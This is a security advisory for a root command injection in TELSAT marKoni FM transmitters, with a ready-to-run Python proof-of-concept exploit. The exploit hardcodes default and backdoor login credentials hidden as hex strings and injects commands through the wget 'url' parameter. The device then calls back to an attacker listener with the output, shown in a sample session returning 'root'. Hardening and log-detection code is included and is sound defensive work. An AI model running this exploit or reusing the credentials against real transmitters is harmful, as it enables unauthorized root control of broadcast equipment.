TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit

Published: 2024-01-30 00:00:00
Author: Gjoko Krstic
Source: zeroscience.mk
Tags: telsat, markoni, fm transmitter, command injection, vulnerability, unauthorized access, administrative privileges, security advisory, exploit, zero science lab

CVSS3: 7.2
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVSS4: 9.3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N

AI Score: 8.7
Confidence: Low
EPSS: 0.001
Percentile: 19.6%

Title: TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
Advisory ID: ZSL-2024-5808
Type: Local/Remote
Impact: System Access, Elevation of Privilege, DoS, Security Bypass
Risk: (5/5)
Release Date: 30.01.2024

Summary

Professional FM transmitters.

Description

The marKoni FM transmitters are susceptible to unauthenticated remote code execution with root privileges. An attacker can exploit a command injection vulnerability by manipulating the Email settings' WAN IP info service, which utilizes the 'wget' module. This allows the attacker to gain unauthorized access to the system with administrative privileges by exploiting the 'url' parameter in the HTTP GET request to ekafcgi.fcgi.
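The root cause described above is a request parameter reaching wget through a shell. The following is an added illustration, not the vendor's firmware code and not part of the advisory: a minimal 'before' handler that builds a shell string (an assumed rendering of the mechanism the description names) next to a hardened handler that validates the value and passes it to wget as a single argv element with no shell. The function names, the URL policy and the checkip.example.net sample host are assumptions.

```python
import re
import subprocess
from urllib.parse import urlsplit


def vulnerable_wget_command(url: str) -> str:
    """'Before' form (assumed mechanism, not the vendor's code): the request
    parameter is pasted into a shell command string. The shell expands
    backticks, $( ), ';' and '|' inside `url`, and a value that starts with
    '-' is parsed by wget as an option instead of a URL."""
    return f"wget -q -O - {url}"


def validate_wan_ip_url(url: str) -> str:
    """Accept only an absolute http(s) URL with a hostname and no whitespace or
    control characters. A leading '-' is rejected because wget would read it
    as an option. Raises ValueError on anything else."""
    if url.startswith("-"):
        raise ValueError("url must not start with '-'")
    if re.search(r"[\s\x00-\x1f]", url):
        raise ValueError("url contains whitespace or control characters")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("url must be an absolute http(s) URL")
    return url


def is_rejected(url: str) -> bool:
    """True when validate_wan_ip_url refuses the value."""
    try:
        validate_wan_ip_url(url)
    except ValueError:
        return True
    return False


def hardened_wget_argv(url: str) -> list:
    """'After' form: argv for subprocess.run(..., shell=False). No shell ever
    sees the value, it travels as exactly one argument, and '--' ends option
    parsing (getopt convention) so even a stray leading '-' could not become
    an option."""
    return ["wget", "-q", "-O", "-", "--", validate_wan_ip_url(url)]


def fetch_wan_ip(url: str, timeout: float = 10.0) -> str:
    """Run wget without a shell and return its stdout (assumes wget is installed)."""
    result = subprocess.run(
        hardened_wget_argv(url),
        capture_output=True, text=True, timeout=timeout, check=True,
    )
    return result.stdout.strip()


if __name__ == "__main__":
    # Constructed value in the shape the advisory describes: an option, then backticks.
    payload = "-U `id` 10.0.8.69:9999"
    print("naive handler would run:", vulnerable_wget_command(payload))
    if is_rejected(payload):
        print("hardened handler rejects the value before wget ever runs")
    print("argv for a legitimate lookup URL:", hardened_wget_argv("http://checkip.example.net/"))
```

The important change is not the regex but the calling convention: once the value is one argv element and no shell is involved, characters such as ';' or backticks inside a URL are harmless, so the validator only has to enforce what a WAN-IP lookup URL must look like.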

Vendor

TELSAT Srl - <https://www.markoni.it>

Affected Version

Markoni-D (Compact) FM Transmitters
Markoni-DH (Exciter+Amplifiers) FM Transmitters
Markoni-A (Analogue Modulator) FM Transmitters
Firmware: 1.9.5, 1.9.3, 1.5.9, 1.4.6, 1.3.9

Tested On

GNU/Linux 3.10.53 (armv7l)
icorem6solox
lighttpd/1.4.33

Vendor Status

[10.11.2023] Vulnerability discovered.
[21.11.2023] Contact with the vendor.
[22.11.2023] No response from the vendor.
[19.01.2024] Contact with the vendor.
[29.01.2024] No response from the vendor.
[30.01.2024] Public security advisory released.

PoC

yp.tiolpxe

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5809.php>
[2] <https://packetstormsecurity.com/files/176933/>
[3] <https://www.exploit-db.com/exploits/51906>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/286366>
[5] <https://www.cisa.gov/news-events/ics-advisories/icsa-24-179-01>
[6] <https://vulners.com/cve/CVE-2024-39373>
[7] <https://nvd.nist.gov/vuln/detail/CVE-2024-39373>

Changelog

[30.01.2024] - Initial release
[01.02.2024] - Added reference [2]
[19.03.2024] - Added reference [3]
[28.03.2024] - Added reference [4]
[01.07.2024] - Added reference [5], [6] and [7]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

#!/usr/bin/env python
#
#
# TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
#
#
# Vendor: TELSAT Srl
# Product web page: https://www.markoni.it
# Affected version: Markoni-D (Compact) FM Transmitters
#                   Markoni-DH (Exciter+Amplifiers) FM Transmitters
#                   Markoni-A (Analogue Modulator) FM Transmitters
#                   Firmware: 1.9.5
#                             1.9.3
#                             1.5.9
#                             1.4.6
#                             1.3.9
#
# Summary: Professional FM transmitters.
#
# Desc: The marKoni FM transmitters are susceptible to unauthenticated
# remote code execution with root privileges. An attacker can exploit
# a command injection vulnerability by manipulating the Email settings'
# WAN IP info service, which utilizes the 'wget' module. This allows
# the attacker to gain unauthorized access to the system with administrative
# privileges by exploiting the 'url' parameter in the HTTP GET request
# to ekafcgi.fcgi.
#
# -------------------------------------------------------------------------
# [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami
# Authentication successful for backdoor
# Injecting command: whoami
# Listening on port 9999
# ('10.0.8.3', 47302) called back
# Received: root
# Housekeeping...
# Zya and thanks for stopping by!
#
# [lqwrm@metalgear ~]# 
#
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.53 (armv7l)
#            icorem6solox
#            lighttpd/1.4.33
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2024-5808
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php
#
#
# 10.11.2023
#

from colorama import init, Fore
import re,os,sys,requests
import socket,threading
from time import sleep
init()

def just_listen_to_me(lport, cstop):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lport))
    s.listen(1)
    print("Listening on port " + str(lport))
    try:
        conn, addr = s.accept()
        print(addr, "called back")
        cstop.set()
    except socket.timeout:
        # conn is never bound when accept() times out; close the listener instead
        print("Call return timeout\nCheck your ports")
        s.close()
        return
    while True:
        try:
            odg = conn.recv(1771).decode()
            uam = re.search(r"User-Agent:\s*(.*)", odg)

            if uam:
                uav = uam.group(1)
                print(f"Received: {uav}")
                exit()
            else:
                print("No output for you")
        except:
            print("Housekeeping...")
            exit()
    s.close()

def authenticate(ipaddr, option): #### Encrypted Shit ####_"
    auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"
    ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"
    if option == "user": ##################################"
        username = "\x75\x73\x65\x72" #####################"
        password = "\x75\x73\x65\x72" #####################"
    elif option == "admin": ###############################"
        username = "\x61\x64\x6D\x69\x6E" #################"
        password = "\x61\x64\x6D\x69\x6E" #################"
    elif option == "backdoor": ############################"
        username = "\x66\x61\x63\x74\x6F\x72\x79" #########"
        password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"

    authp = {
        'username': username,
        'password': password
    }

    resp = requests.get(auth_url + ep + "1", params=authp)

    if "Set-Cookie" in resp.headers:
        print(f"Authentication successful for {option}")
        auth_cookie = resp.headers["Set-Cookie"].split(";")[0]
        return auth_cookie
    else:
        print(f"Authentication failed for {option}.")
        print("Try a different option.")
        return None

def execute(ipaddr, cookie, command, listen_ip):
    print(f"Injecting command: {command}")
    ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
    eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"
    dva = f"http://{ipaddr}{ep}27"
    tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="
    clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"

    headers = {"Cookie": cookie}

    requests.get(eden, headers=headers)
    sleep(2)
    requests.get(dva, headers=headers)
    sleep(2)
    requests.get(tri, headers=headers)
    sleep(1)
    requests.get(clear, headers=headers)
    print("Zya and thanks for stopping by!")
    exit(0)

def njaaah(text):
    columns = os.get_terminal_size().columns
    print(text.center(columns))

zsl = "\033[91mWaddup!\033[0m" #Win64
mrjox = f"""
     ________
   /          \\
  /    ____    \\
 |   /    0 \\   |
 |   \\______/   | 
  \\____________/  {zsl}
       | |
      /   \\
     /  O  \\
    |    O  \\
    |       \\
    |        \\
    |_________|
        """

if len(sys.argv) != 5:
    print()
    print("This is a PoC script for the marKoni transmitters 0day")
    print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")
    print("Option: 'user', 'admin', 'backdoor'")
    print("Default listening port: 9999")
    njaaah(mrjox)
    exit()

ipaddr = sys.argv[1]
opt = sys.argv[2]
listen_ip = sys.argv[3]
command = sys.argv[4]

opt_map = {
    "admin"    : "admin",
    "user"     : "user",
    "backdoor" : "backdoor"
}

if opt in opt_map:
    auth_cookie = authenticate(ipaddr, opt_map[opt])
    if auth_cookie:
        cstop = threading.Event()
        lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))
        lt.start()
        execute(ipaddr, auth_cookie, command, listen_ip)
        cstop.set()
        lt.join()
else:
    print("Invalid option.")
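The four requests the PoC sends all go through ekafcgi.fcgi, and the injected value travels in the query string of a GET, so it lands verbatim in the web server's access log. Below is an added detection example (not part of the advisory or the PoC) that scans combined-style access log lines for OpCode=26 wget-configuration requests whose url parameter starts with an option dash or carries shell metacharacters. The log lines are constructed for this example, and the assumption that the transmitter's lighttpd writes a %h %l %u %t "%r" %>s %b "Referer" "User-Agent" format is mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined-style format is an assumption).
# Line 2 mirrors the request shape the PoC sends; line 3 is a legitimate lookup URL.
SAMPLE_LOG = """\
10.0.8.69 - - [30/Jan/2024:10:15:01 +0100] "GET /cgi-bin/ekafcgi.fcgi?OpCode=1&username=admin&password=admin HTTP/1.1" 200 312 "-" "python-requests/2.31.0"
10.0.8.69 - - [30/Jan/2024:10:15:03 +0100] "GET /cgi-bin/ekafcgi.fcgi?OpCode=26&param=wget&ena=1&url=-U%20%60whoami%60%2010.0.8.69:9999 HTTP/1.1" 200 78 "-" "python-requests/2.31.0"
10.0.8.50 - - [30/Jan/2024:10:16:00 +0100] "GET /cgi-bin/ekafcgi.fcgi?OpCode=26&param=wget&ena=1&url=http://checkip.example.net/ HTTP/1.1" 200 78 "-" "Mozilla/5.0"
10.0.8.50 - - [30/Jan/2024:10:16:07 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# host ident user [timestamp] "METHOD target ..." status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# A url value beginning with '-' is consumed by wget as an option; backticks,
# $( ), ';' and '|' are shell metacharacters. None belong in a WAN-IP lookup URL.
SUSPICIOUS_URL = re.compile(r"^-|[`;|]|\$\(")


def analyze_line(line: str):
    """Return a finding dict for a wget-configuration request (OpCode=26,
    param=wget) whose url value looks like option or shell injection; else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/ekafcgi.fcgi"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if query.get("OpCode") != ["26"] or query.get("param") != ["wget"]:
        return None
    url = query.get("url", [""])[0]
    if not SUSPICIOUS_URL.search(url):
        return None
    return {
        "src": m.group("src"),
        "ts": m.group("ts"),
        "status": m.group("status"),
        "url": url,
    }


def detect(log_text: str) -> list:
    """Run analyze_line over every line and return the findings in log order."""
    return [f for f in (analyze_line(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"[{f['ts']}] {f['src']} set wget url to {f['url']!r} (HTTP {f['status']})")
```

Because parse_qs already percent-decodes, the encoded %60 backticks and %20 spaces in the logged request are compared in their decoded form, which is also how the CGI would have handed them to wget. The successful OpCode=1 login from the same source two seconds earlier is a useful correlation key, but it is not flagged here: credentials in a GET query string are normal for this interface and would be a separate finding.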
